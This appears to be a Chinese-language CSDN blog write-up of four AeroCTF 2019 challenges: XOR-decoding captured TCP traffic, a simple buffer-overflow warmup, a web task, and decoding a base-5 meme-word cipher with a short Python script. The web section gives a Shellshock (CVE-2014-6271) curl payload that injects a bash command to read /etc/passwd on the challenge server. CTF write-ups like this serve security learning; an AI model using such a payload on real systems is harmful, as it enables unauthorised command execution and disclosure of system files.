AeroCTF 2019 部分题目Writeup

本文提供了AeroCTF 2019中几道挑战的解题思路,涉及Forensic、Pwn、Web和Forensic Warmup等领域。通过流量分析、缓冲区溢出、CVE利用和模式识别等技巧,成功解决各关卡并获取Flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01: 【Forensic】undefined protocol

题目说明:We managed to get traffic from the machine of one of the hackers who hacked our navigation systems, but they use some kind of strange protocol over TCP. We were not able to disassemble it, maybe you can find out what he was transmitting?

file - Mega

file - Google Drive

解题思路:这道题其实就是流量分析

下载后载入WireShark

先右键第0条 跟踪tcp流 发现没什么特别 接着继续向下看
在这里插入图片描述
在这里插入图片描述
就会发现全部都是一个数字 加一串字符 猜测是一种加密方式

60

…YQ]RNYOiWYNI^YT_6HUDy6.XUP]JRU.OU.YQ]RNYOi.a.gXNSKOO]L //类似于这样子

具体是什么 只能靠猜测了

尝试数字与字符串进行异或解密 能够解出来一串可见字符

最后可以知道最后一条就是我们要找的
在这里插入图片描述

在这里插入图片描述

再逆序一下:
在这里插入图片描述
提交的时候注意格式:Aero{94d04d04b327e4e52a0bb6c67b3fca7b}

0x02: 【Warmup】pwn_warmup

Now they have made a server with memes, it has authorization. See if you can get around it.

Server: 185.66.87.233 5004

file - Mega

file - Google Drive

感觉这道题是全场最简单的了 直接输入足够长的a就可以溢出

1552734199545

0x03: 【Web 100】 board tracking system

We develop advanced board tracking system, is it vulnerable?

Site: http://81.23.11.159:8080/

打开看看
在这里插入图片描述

先查看源代码

在这里插入图片描述

可以看到这个/cgi-bin/stats google可以找到这个CVE

CVE-2014-6271 Bash漏洞利用工具 - SecPulse.COM | 安全脉搏
https://www.secpulse.com/archives/917.html

最后cat /etc/passwd就可以拿到flag

附赠一个payload:

curl -H"user-agent ?){:;}; echo; echo; / bin / bash -c’cat / etc / passwd’"http://81.23.11.159:8080 / cgi-bin / stats

0x04: 【Warmup】 forensic_warmup

Again, these memes, we have even stopped talking to them. Just look at it, they seem to be crazy.

file - MEGA

file - Google Drive

打开之后是这样的

kappa_pride pepe kappa
look_at_this_dude kappa trollface
look_at_this_dude kappa_pride look_at_this_dude
look_at_this_dude kappa_pride trollface
look_at_this_dude look_at_this_dude pepe
kappa_pride trollface kappa
pepe look_at_this_dude kappa_pride
kappa_pride trollface kappa_pride
trollface look_at_this_dude look_at_this_dude
trollface look_at_this_dude look_at_this_dude
pepe look_at_this_dude look_at_this_dude
pepe look_at_this_dude look_at_this_dude
look_at_this_dude kappa kappa_pride
pepe look_at_this_dude pepe
trollface look_at_this_dude look_at_this_dude
kappa_pride trollface trollface
pepe look_at_this_dude look_at_this_dude
kappa_pride kappa kappa
look_at_this_dude kappa kappa_pride
pepe look_at_this_dude kappa_pride
look_at_this_dude kappa kappa_pride
look_at_this_dude kappa trollface
kappa_pride kappa kappa
kappa_pride trollface kappa_pride
kappa_pride kappa look_at_this_dude
trollface look_at_this_dude pepe
pepe look_at_this_dude pepe
kappa_pride kappa look_at_this_dude
look_at_this_dude kappa trollface
look_at_this_dude kappa trollface
kappa_pride kappa kappa
pepe look_at_this_dude look_at_this_dude
pepe look_at_this_dude pepe
pepe look_at_this_dude look_at_this_dude
kappa_pride trollface kappa_pride
pepe look_at_this_dude look_at_this_dude
kappa_pride trollface kappa
trollface kappa kappa kappa

仔细观察可以发现 只出现五个单词kappa_pride ,pepe ,kappa,look_at_this_dude ,trollface

而且只有最后一行是四个单词 其他的行都只有三个(如果看不太清楚 可以替换为a,b,c,d)

这道题目真脑洞

根据flag格式为Aero{xxxxxxxxxxxxxxxxx}

可以发现前面是Areo{,而后面最后一个是}

A的十六进制是0x41 五进制是230

}的十六进制是0x7d 五进制是1000

我们直接根据这两个就可以找到对应关系

0:kappa
1:trollface
2:kappa_pride
3:pepe
4:look_at_this_dude

flag = ""
table = {
    'kappa': '0',
    'trollface': '1',
    'kappa_pride': '2',
    'look_at_this_dude': '4',
    'pepe': '3'
}
with open("meme_or_not", "r") as f:
    for line in f:
        cs = line.split()
        char = ''
        for c in cs:
            char += table[c]
        flag += chr(int(char, 5))
print(flag)
#Aero{7a911ccfb18c2fafe2960b6ee2cbc9c7}
参考链接:

https://ptr-yudai.hatenablog.com/entry/2019/03/09/215844#Forensic-497-data-container

https://kusuwada.hatenablog.com/entry/2019/03/09/181023#section2

https://medium.com/@wywyit/ritsec-fall-2018-ctf-week-6-45d414035c76

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值